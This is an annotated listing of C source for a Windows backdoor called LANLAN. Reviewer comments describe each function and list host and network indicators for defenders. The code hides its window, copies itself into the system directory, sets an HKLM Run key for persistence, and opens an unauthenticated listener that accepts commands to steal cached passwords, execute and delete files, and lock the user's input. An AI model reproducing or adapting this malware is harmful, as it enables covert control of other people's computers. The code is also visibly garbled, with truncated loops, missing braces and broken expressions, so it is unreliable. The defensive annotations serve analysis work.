VOID WINAPI LockMK (BOOL Ctrl) {RECT rc; switch (Ctrl) {case TRUE: ZeroMemory (& rc, sizeof (rc)); ClipCursor (& rc); SystemParametersInfo (SPI_SCREENSAVERRUNNING, TRUE, NULL, 0); SystemParametersInfo (SPI_SETFASTTASKSWITCH, TRUE , NULL, 0); break; case FALSE: ClipCursor (NULL); SystemParametersInfo (SPI_SCREENSAVERRUNNING, FALSE, NULL, 0); SystemParametersInfo (SPI_SETFASTTASKSWITCH, FALSE, NULL, 0); break;}} // ------ -------------------------------------------------- ------------------- // Execommand // execute command // ---------------------- -------------------------------------------------- ---
// Command dispatcher: maps one line of text received from the peer to a handler in this file.
// Commands without arguments are matched on the whole string with lstrcmp (password cache, system
// information, current path, CD tray open/close, show/hide desktop, lock/unlock input, process list,
// shutdown). Commands with arguments are matched on their prefix with strncmp (message box, execute
// file, change directory, directory listing, delete, copy, rename); the text after the command word
// is copied into param1, and for copy/rename the text after the next separator into param2.
// Anything else is answered with "Bad Command !!!".
// No credential, token or peer-address check appears anywhere between the socket and this function,
// so whoever can reach the listening port can drive every handler. The command words and usage
// strings would be present as plain text in a compiled binary and in the traffic, but their letter
// case in this listing was altered by translation and should not be relied on for exact matching.
// NOTE(review): every argument loop header is cut off after "i" and the separator comparisons are
// damaged, so the exact parsing rules cannot be read from this page. Several usage branches send a
// message but do not return before parsing continues (only the copy and rename branches print a
// Return). The copies into param1/param2 (100 characters each) use lstrcpy with no length check.
// The closing braces of the last branch and of the function are missing.
Void Execommand (lpctstr szcommand, hwnd hwnd) {tchar szbuf [MAX_PATH]; TCHAR param1 [100]; tchar param2 [100]; int 1;
IF ((LSTRCMP (Szcommand, "GetPW")) == 0) getCachePW ();
ELSE IF ((LSTRCMP (Szcommand, "GetInfo")) == 0) getsysInfo ();
ELSE IF ((LSTRCMP (Szcommand, "GCPATH")) == 0) getCurpath ();
Else IF ((LSTRCMP (SZCommand, "OpenCD"))) == 0) Ctrlcd (HWND, TRUE);
ELSE IF ((LSTRCMP (SZCommand, "CloseCD")) == 0) Ctrlcd (HWND, FALSE);
ELSE IF ((LSTRCMP (SZCommand, "Showsys"))) == 0) Hssys (hwnd, true);
ELSE IF ((LSTRCMP (Szcommand, "HIDESYS")))) == 0) Hssys (hwnd, false);
ELSE IF ((LSTRCMP (SZCommand, "Lockmk") == 0) LockMk (TRUE);
ELSE IF ((LSTRCMP (SZCommand, "UNLOCK")) == 0) LockMK (False);
ELSE IF ((LstrCMP (SZCommand, "DPROC") == 0) Enumprocess ();
ELSE IF ((LstrCMP (Szcommand, "EXITWIN")) == 0) exitwin ();
ELSE IF ((Strncmp (Szcommand, "POPMSG", LSTRLEN ("Popmsg"))) == 0) {if (lstrlen (szcommand) 2) {Send (Newsock, "Usage: POPMSG Message ", 28, 0);} for (i = lstrlen (" popmsg ") 1; IIF (szcommand == ') Break;
IF (i == lstrlen (szcommand))
{
LSTRCPY (param1, szcommand lstrlen ("popmsg") 1);
POPMSG (param1, hwnd);
}
}
ELSE IF ((Strncmp (Szcommand, "Execfile", lstrlen ("execfile"))) == 0) {if (lstrlen (szcommand) <= lstrlen ("execFile" 2) {send (news, "usage: Execfile szfilename ", 28, 0);} for (i = lstrlen (" execfile ") 1; i
IF (SZCommand == ') Break;
IF (i == lstrlen (szcommand))
{
Lstrcpy (param1, szcommand lstrlen ("execfile") 1);
IF (loadProcess (param1) == false)
Send (Newsock, "Execfile Fail", 14, 0);
Else
Send (Newsock, "Execfile OK", 11, 0);
}
}
ELSE IF ((SZCMMP (SZCMMAND, "CD", LSTRLEN ("CD")))) == 0) {IF (lstrlen (szcommand) <= LSTRLEN ("CD") 2) {Send (Newsock, "CD Drive // Directory ", 19, 0);} for (i = lstrlen (" cd ") 1; i
IF (SZCommand == ') Break;
IF (i == lstrlen (szcommand))
{
LSTRCPY (param1, szcommand lstrlen) 1);
ChangeDir (param1) == false)
Send (Newsock, "Change Directory Fail", 21, 0);
Else
Send (Newsock, "Change Directory OK", 19, 0);
}
}
Else IF ((Strncmp (SZCMMAND, "DIR", LSTRLEN ("DIR"))) == 0) {IF (lstrlen (szcommand) <= lstrlen ("DIR") 2) {DIR ("*. *" );} for (i = lstrlen ("dir") 1; i
IF (SZCommand == ') Break;
IF (i == lstrlen (szcommand))
{
LSTRCPY (param1, szcommand lstrlen ("dir") 1);
DIR (param1);
}
}
Else IF ((SZCMMP (SZCMMAND, "DEL", LSTRLEN ("DEL"))) == 0) {IF (lstrlen (szcommand) <= lstrlen ("del") 2) {send (newsock, "usage: Del SzFileName ", 28, 0);} for (i = lstrlen (" del ") 1; i
IF (SZCommand == ') Break;
IF (i == lstrlen (szcommand))
{
Lstrcpy (param1, szcommand lstrlen ("del") 1);
Delete (param1);
}
}
ELSE IF ((Strncmp (Szcommand, "Copy", LStrlen ("Copy"))) == 0) {IF (Lstrlen (Szcommand) <= LSTRLEN ("Copy") 2) {Send (Newsock, "Usage: Copy Drive // FileName ", 28, 0); Return;} for (i = lstrlen (" copy ") 1; i
IF (SZCommand == ') Break;
IF (i == lstrlen (szcommand))
{
LSTRCPY (param1, szcommand lstrlen ("copy") 1);
LSTRCPY (param2, ");
Send (Newsock, "Copy File1 To File2", 19, 0);
}
Else
{
LSTRCPY (SZBUF, SZCommand);
SZBUF = 0;
LSTRCPY (param1, szbuf lstrlen ("copy") 1);
LSTRCPY (param2, szbuf i 1);
Copy (Param1, Param2);
}
}
ELSE IF ((Strncmp (SZCMMAND, "REN", LSTRLEN ("Ren"))) == 0) {IF (Lstrlen (SZCommand) <= LSTRLEN ("Ren") 2) {Send (Newsock, "Usage: Ren Drive // FileName ", 28, 0); Return;} for (i = lstrlen (" ren ") 1; i
IF (SZCommand == ') Break;
IF (i == lstrlen (szcommand))
{
LSTRCPY (param1, szcommand lstrlen ("ren") 1);
LSTRCPY (param2, ");
Send (Newsock, "Ren File1 To File2", 19, 0);
}
Else
{
LSTRCPY (SZBUF, SZCommand);
SZBUF = 0;
LSTRCPY (param1, szbuf lstrlen ("ren") 1);
LSTRCPY (param2, szbuf i 1);
Ren (param1, param2);
}
Else Send (Newsock, "Bad Command !!!", 16, 0);
/ / -------------------------------------------------------------------------------------------- --------------------------- // INITSOCKET / / Initialization Socket / / -------------- -------------------------------------------------- ------------
// Creates the listening socket and ties it to the window's message loop.
// Steps, in order: WSAStartup; create a TCP (SOCK_STREAM) socket; fill sock_in with AF_INET, the
// `port` constant and INADDR_ANY; set SO_REUSEADDR; bind; listen with a backlog of 3; register the
// socket with the window for FD_ACCEPT and FD_CLOSE notifications delivered as WM_SOCKET. Each
// failure shows a message box, closes the socket where one exists, and returns FALSE; success
// returns TRUE after storing the address length used later by accept.
// Because the bind address is INADDR_ANY the listener is reachable on every network interface of
// the host. An unexpected process listening on the port defined at the top of the file (9102) is
// therefore a direct host indicator, and inbound connections to that port a network indicator;
// blocking the port at the host or perimeter firewall cuts off control of the program.
// NOTE(review): the arguments of WSAStartup and bind and the name of the async-select call are
// damaged in the listing. WSACleanup is never called on the failure paths.
Bool WinAPI INITSOCKET (HWND HWND) {IF ((WSAStartup (Wsadata))! = 0) {MessageBox (hwnd, "init socket error", null, mb_ok); return false;}
Createsock = Socket (AF_INET, SOCK_STREAM, 0); if (createSock == Socket_ERROR) {CloseSocket (Createsock); MessageBox (hwnd, "socket error", null, mb_ok); return false;}
Sock_in.sin_family = AF_INET; SOCK_IN.SIN_PORT = HTONS (port); sock_in.sin_addr.s_un.s_addr = HTONL (INADDR_ANY);
Setsockopt (Createsock, SOL_Socket, SO_REUSEADDR, (LPSTR) & dwflag, sizeof (dwflag));
IF (Bind (Createsock, (LPSOCKADDR) == SOCKET_ERROR) {CloseSocket (Createsock); MessageBox (hwnd, "bind error", null, mb_ok); return false;}
Else IF (Listen (Createsock, 3) == Socket_ERROR) {CloseSocket (Createsock); MessageBox (HWnd, "Listen Error", NULL, MB_OK; RETURN FALSE;}
Else IF (Createsock, Hwnd, WM_Socket, FD_ACCEPT | FD_CLOSE) == Socket_ERROR) {CloseSocket (Createsock); MessageBox (hwnd, "wsaselect error", null, mb_ok); Return False;}
Addrlen = Sizeof (SockAddr_in);
Return True;}
/ / -------------------------------------------------------------------------------------------- ---------------------------
// Window procedure of the hidden window; all network activity is driven from here.
// WM_SOCKET (asynchronous socket notification):
//   - on a select error the socket in wParam is closed;
//   - FD_ACCEPT: accepts the connection into NewSock, registers it for read/write/close
//     notifications and sends a banner line followed by the prompt;
//   - FD_READ: reads up to dwcomm bytes; if the first byte is a carriage return it sends the prompt,
//     passes the text accumulated in szExec to Execommand and clears it, otherwise it appends the
//     received bytes to szExec and echoes them back;
//   - FD_CLOSE: closes the socket in wParam.
// WM_DESTROY unregisters the service-process registration and posts the quit message; every other
// message goes to DefWindowProc.
// The session is a plain-text line protocol with no authentication step and no encryption: the
// banner and prompt are sent immediately on connect, which makes them usable as a network signature
// (letter case in this listing is unreliable because of the translation).
// NOTE(review): the return value of recv is ignored; the append to szExec (printed only as
// "lstrcat;") shows no bound against the 50-character buffer; every send passes dwcomm as the
// length regardless of the string's length; a second accept overwrites NewSock without closing
// the previous connection.
Lresult Callback WndProc (HWND HWND, UINT MESSAGE, WPARAM WPARAM, LPARAM LPARAM) {
Static tchar szcommand [dwcomm]; static tchar szexec [dwcomm];
Switch (Message) {Case WM_Socket: IF (WsagetSelectError (LPARAM)) {CloseSocket (WPARAM); Break;}
switch (WSAGETSELECTEVENT (lParam)) {// connector case FD_ACCEPT: NewSock = accept (CreateSock, (LPSOCKADDR) & NewSock_in, & addrlen); WSAAsyncSelect (NewSock, hWnd, WM_SOCKET, FD_READ | FD_WRITE | FD_CLOSE); wsprintf (szCommand, "LANLAN Ver 1.0 Write By Virus / N / N / R% S ", Prompt); Send (Newsock, Szcommand, DWCOMM, 0); Break; // Read input, if the carriage return, execute command // is not copied to buffer Area Case FD_READ: ZeromeMory (Szcommand, DWCOMM); Recv (Newsock, Szcommand, DWComm, 0); if (Szcommand [0] == VK_RETURN) {WSPrintf (Szcommand, "/ N / N / R% S", prompt) Send (Newsock, Szcommand, DWcomm, 0); Execommand (Szexec, Hwnd); ZeromeMory (Szec, DWComm);} else lstrcat; send (newsock, szcommand, dwcomm, 0); BREAK;
Case FD_Close: CloseSocket (WPARAM); BREAK;} Break;
Case WM_DESTROY: HIDEPROC (Unservice_Proc); PostquitMessage (0); Break;
Default: Return DefwindowProc (HWnd, Message, WPARAM, LPARAM);
} Return 0;}
/ / -------------------------------------------------------------------------------------------- ---------------------------
// Program entry point: creates the hidden window, starts the listener and installs persistence.
// Sequence visible in the listing:
//   1. Registers a window class named by szAppName ("LANLAN") with WndProc as its procedure and
//      creates a window titled "LanlanServer", which is immediately hidden with SW_HIDE.
//   2. On Windows 9x only, calls HideProc to register the process as a service process.
//   3. Calls InitSocket to start listening (its return value is not checked).
//   4. Builds <system directory> + the `run` file name and copies the running executable there
//      with CopyFile, overwriting any existing file.
//   5. Opens/creates the HKEY_LOCAL_MACHINE ...\CurrentVersion\Run key and sets a string value named
//      "WINMON32" to the path of the copy, so the copy is started at each logon.
//   6. Runs the standard GetMessage/TranslateMessage/DispatchMessage loop.
// Host indicators a defender can check, all taken from this listing: a file named winmon32.exe in
// the system directory, a Run value named WINMON32 under HKLM pointing at it, and a hidden top-level
// window with the class and title above. Removing the Run value and the copied file (with the
// process stopped) undoes the persistence shown here. Exact letter case of these strings is
// uncertain because the translation altered case throughout.
// NOTE(review): the "+" in two size expressions and the return type were lost in translation; the
// RegSetValueEx length omits the terminating NUL; the message loop's and function's closing braces
// are missing.
WINAPI WinMain (HINSTANCE hInstance, HINSTANCE, LPSTR, int) {HWND hWnd; MSG msg; WNDCLASS wndc; LPSTR szAppName = "LANLAN"; HKEY hKey = 0; DWORD disp = 0; LONG lResult; TCHAR szKey [MAX_PATH]; TCHAR szSysDir [MAX_PATH 25]; Tchar SzFileName [MAX_PATH];
wndc.style = 0; wndc.lpfnWndProc = WndProc; wndc.cbClsExtra = 0; wndc.cbWndExtra = 0; wndc.hInstance = hInstance; wndc.hIcon = LoadIcon (NULL, IDI_APPLICATION); wndc.hCursor = LoadCursor (NULL, IDC_ARROW ); wndc.hbrbackground = (hbrush) (color_window 1); wndc.lpszMenuname = null; wndc.lpszclassname = szappname; registerclass (& WNDC);
HWnd = CREATEWINDOW (Szappname, "LanlanServer", WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, NULL, NULL, HINSTANCE, NULL;
ShowWindow (hwnd, sw_hide); updateWindow (hwnd); if (GetOS () == ver_platform_win32_windows) {hideproc (service_proc);} initsocket (hwnd); // copy file to system directory / / and load registry, automatic operation
GetSystemDirectory (szsysdir, max_path); LSTRCAT (SZSYSDIR, RUN); getModuleFileName (Null, SzFileName, Max_Path); CopyFile (SZFileName, Szsysdir, False);
lstrcpy (szKey, "SOFTWARE // Microsoft // Windows // CurrentVersion // Run"); lResult = RegCreateKeyEx (HKEY_LOCAL_MACHINE, szKey, 0, NULL, REG_OPTION_VOLATILE, KEY_ALL_ACCESS, NULL, & hKey, & disp);
IF (LRESULT == Error_Success) {LRESULT = RegSetValueex (HKEY, "WINMON32", 0, REG_SZ, SZSYSDIR, LSTRLEN (SZSYSDIR); RegcloseKey (HKEY);}
While (GetMessage (& MSG, NULL, 0, 0)) {TranslateMessage (& MSG); DispatchMessage (& MSG);
Return (msg.wparam);